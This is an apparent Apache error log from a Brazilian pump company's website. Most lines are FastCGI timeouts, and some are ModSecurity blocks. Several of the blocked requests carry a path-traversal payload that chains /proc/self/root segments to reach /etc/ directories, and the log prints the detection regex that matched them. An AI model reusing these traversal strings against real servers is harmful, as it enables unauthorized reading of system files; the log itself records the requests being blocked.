[Wed Mar 18 21:17:34.157364 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52228] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:17:57.117829 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52594] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:18:22.110370 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:52940] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:18:49.009840 2026] [proxy_fcgi:error] [pid 23798:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53322] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:19:25.158055 2026] [proxy_fcgi:error] [pid 27293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53640] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:19:55.933866 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:54136] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:20:17.337803 2026] [proxy_fcgi:error] [pid 29882:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54842] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:20:39.121809 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55108] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:21:01.125834 2026] [proxy_fcgi:error] [pid 30077:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55210] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:21:29.689844 2026] [proxy_fcgi:error] [pid 27403:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:55252] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:22:19.348791 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.244.43:51128] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtBu8df6f5d65gmYZQaTwAAAsc"]
[Wed Mar 18 21:22:37.478544 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55346] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:23:15.958873 2026] [proxy_fcgi:error] [pid 23798:tid 140411599251200] [client 179.188.53.243:55468] AH01067: Failed to read FastCGI header
[Wed Mar 18 21:23:15.958927 2026] [proxy_fcgi:error] [pid 23798:tid 140411599251200] (104)Connection reset by peer: [client 179.188.53.243:55468] AH01075: Error dispatching request to : 
[Wed Mar 18 21:24:15.503352 2026] [proxy_fcgi:error] [pid 23798:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55650] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:24:15.560911 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.228.61:44764] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtCL-yqAr6etmhZHNoNhQAAAEU"]
[Wed Mar 18 21:24:37.128927 2026] [proxy_fcgi:error] [pid 9800:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:56230] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:25:05.334539 2026] [proxy_fcgi:error] [pid 9800:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56328] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:25:17.850059 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.241.31:37736] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtCbSmAPhZkrhU8w4mvAwAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:25:34.921899 2026] [proxy_fcgi:error] [pid 29882:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56408] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:26:28.485852 2026] [proxy_fcgi:error] [pid 30077:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56460] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:26:50.561913 2026] [proxy_fcgi:error] [pid 9333:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56708] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:27:14.793891 2026] [proxy_fcgi:error] [pid 9333:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:56864] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:27:36.786056 2026] [proxy_fcgi:error] [pid 27403:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56926] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:28:04.009590 2026] [proxy_fcgi:error] [pid 27403:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56978] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:29:13.893929 2026] [proxy_fcgi:error] [pid 9333:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57054] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:29:37.110759 2026] [proxy_fcgi:error] [pid 27403:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:57682] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:29:59.069807 2026] [proxy_fcgi:error] [pid 15051:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57788] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:30:20.128315 2026] [proxy_fcgi:error] [pid 15051:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57882] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:30:41.126330 2026] [proxy_fcgi:error] [pid 9800:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57958] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:31:09.213914 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58020] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:31:52.813862 2026] [proxy_fcgi:error] [pid 9333:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58096] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:32:36.905317 2026] [proxy_fcgi:error] [pid 27403:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58192] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:33:16.439453 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.244.43:38004] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtETOw_le52K8_3pV0glQAAAhA"]
[Wed Mar 18 21:33:16.519773 2026] [proxy_fcgi:error] [pid 9333:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58328] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:33:32.894396 2026] [:error] [pid 9333:tid 140411691570944] [client 74.7.241.31:47298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtEXA_eYRmh974Uj6QIeAAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:33:45.693817 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58418] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:34:37.197232 2026] [proxy_fcgi:error] [pid 27403:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58504] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:34:56.372191 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.228.61:53038] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtEsOoXxyEfFpUF8f-7HAAAAUQ"]
[Wed Mar 18 21:34:59.168806 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58620] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:35:21.137836 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59052] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:35:26.879585 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:55872] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtEzuoXxyEfFpUF8f-7KAAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:35:42.233849 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59158] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:36:10.033840 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:59216] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:36:27.325385 2026] [:error] [pid 23798:tid 140411590858496] [client 74.7.241.31:53124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtFCz-9rzzdA3Ti0NCYQwAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:36:55.881842 2026] [proxy_fcgi:error] [pid 9333:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59278] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:37:22.532273 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59342] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:37:45.061911 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59682] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:38:07.117361 2026] [proxy_fcgi:error] [pid 27403:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59750] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:38:29.065834 2026] [proxy_fcgi:error] [pid 23798:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59842] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:38:57.355918 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59906] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:39:46.277870 2026] [proxy_fcgi:error] [pid 27403:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59952] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:40:10.256910 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.228.61:45286] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtF6hkFeYa1D6dYQnCSWAAAAck"]
[Wed Mar 18 21:40:16.027971 2026] [proxy_fcgi:error] [pid 11816:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60080] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:40:57.378115 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60152] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:41:26.739630 2026] [proxy_fcgi:error] [pid 15826:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60208] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:41:54.637807 2026] [proxy_fcgi:error] [pid 23798:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60446] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:42:45.721841 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60500] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:43:25.137866 2026] [proxy_fcgi:error] [pid 9530:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60578] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:44:06.753892 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:60714] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:44:29.625911 2026] [proxy_fcgi:error] [pid 15051:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60930] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:44:59.129796 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:32800] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:45:22.501885 2026] [proxy_fcgi:error] [pid 27403:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:32898] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:46:05.029859 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:32952] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:46:36.109807 2026] [proxy_fcgi:error] [pid 9530:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33022] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:47:45.779944 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33154] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:49:09.509979 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33238] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:49:56.085868 2026] [proxy_fcgi:error] [pid 9333:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33396] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:50:17.246501 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33552] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:51:10.749877 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33648] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:52:47.397829 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33742] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:53:18.344227 2026] [proxy_fcgi:error] [pid 14269:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33932] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:53:53.400594 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34018] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:54:17.793813 2026] [proxy_fcgi:error] [pid 15051:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34126] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:54:39.267945 2026] [proxy_fcgi:error] [pid 9800:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34212] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:55:13.816732 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34304] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:56:35.989673 2026] [proxy_fcgi:error] [pid 11816:tid 140411574073088] [client 179.188.53.243:34366] AH01067: Failed to read FastCGI header
[Wed Mar 18 21:56:35.989763 2026] [proxy_fcgi:error] [pid 11816:tid 140411574073088] (104)Connection reset by peer: [client 179.188.53.243:34366] AH01075: Error dispatching request to : 
[Wed Mar 18 21:57:20.325860 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34522] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:57:47.450007 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34642] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:58:30.737839 2026] [proxy_fcgi:error] [pid 9333:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34692] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:59:02.996478 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34796] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:59:35.237959 2026] [proxy_fcgi:error] [pid 15051:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34840] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:59:58.662862 2026] [proxy_fcgi:error] [pid 27293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34904] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:00:23.433887 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34976] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:01:42.488547 2026] [proxy_fcgi:error] [pid 11816:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35032] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:03:15.989990 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] [client 179.188.53.243:35180] AH01067: Failed to read FastCGI header
[Wed Mar 18 22:03:15.990053 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (104)Connection reset by peer: [client 179.188.53.243:35180] AH01075: Error dispatching request to : 
[Wed Mar 18 22:03:45.052574 2026] [proxy_fcgi:error] [pid 11816:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35366] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:04:07.512736 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:35472] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:04:39.411857 2026] [proxy_fcgi:error] [pid 15051:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35494] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:04:51.885171 2026] [:error] [pid 9800:tid 140411649607424] [client 74.7.244.43:41620] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtLsYJpNEVVDhwB8vOI8AAAA4s"]
[Wed Mar 18 22:05:12.855595 2026] [proxy_fcgi:error] [pid 9333:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35602] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:06:36.014948 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35658] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:07:10.359124 2026] [proxy_fcgi:error] [pid 9800:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35836] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:08:30.329848 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35878] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:09:19.965444 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36048] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:09:51.995335 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36120] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:10:17.225855 2026] [proxy_fcgi:error] [pid 9333:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36314] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:10:55.227703 2026] [proxy_fcgi:error] [pid 9800:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36344] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:11:42.885814 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36398] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:12:28.465852 2026] [proxy_fcgi:error] [pid 9800:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:36450] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:13:27.665846 2026] [proxy_fcgi:error] [pid 15051:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36528] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:13:49.701825 2026] [proxy_fcgi:error] [pid 31803:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:36670] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:14:25.737853 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36694] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:14:55.996403 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] [client 179.188.53.243:36746] AH01067: Failed to read FastCGI header
[Wed Mar 18 22:14:55.996472 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (104)Connection reset by peer: [client 179.188.53.243:36746] AH01075: Error dispatching request to : 
[Wed Mar 18 22:15:55.341842 2026] [proxy_fcgi:error] [pid 9800:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36822] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:17:11.560429 2026] [proxy_fcgi:error] [pid 9530:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36890] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:18:27.777895 2026] [proxy_fcgi:error] [pid 15051:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:37026] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:19:25.757865 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37106] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:19:56.125845 2026] [proxy_fcgi:error] [pid 15051:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:37168] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:21:02.737862 2026] [proxy_fcgi:error] [pid 9800:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:37222] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:21:37.574140 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37310] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:22:11.597863 2026] [proxy_fcgi:error] [pid 9530:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37388] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:23:16.113785 2026] [proxy_fcgi:error] [pid 11816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37424] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:23:49.495126 2026] [proxy_fcgi:error] [pid 15051:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37578] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:24:56.179220 2026] [proxy_fcgi:error] [pid 15051:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:37630] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:26:24.174905 2026] [proxy_fcgi:error] [pid 15051:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37738] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:27:02.046945 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37930] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:27:43.757939 2026] [proxy_fcgi:error] [pid 15051:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38022] AH01075: Error dispatching request to : (polling)
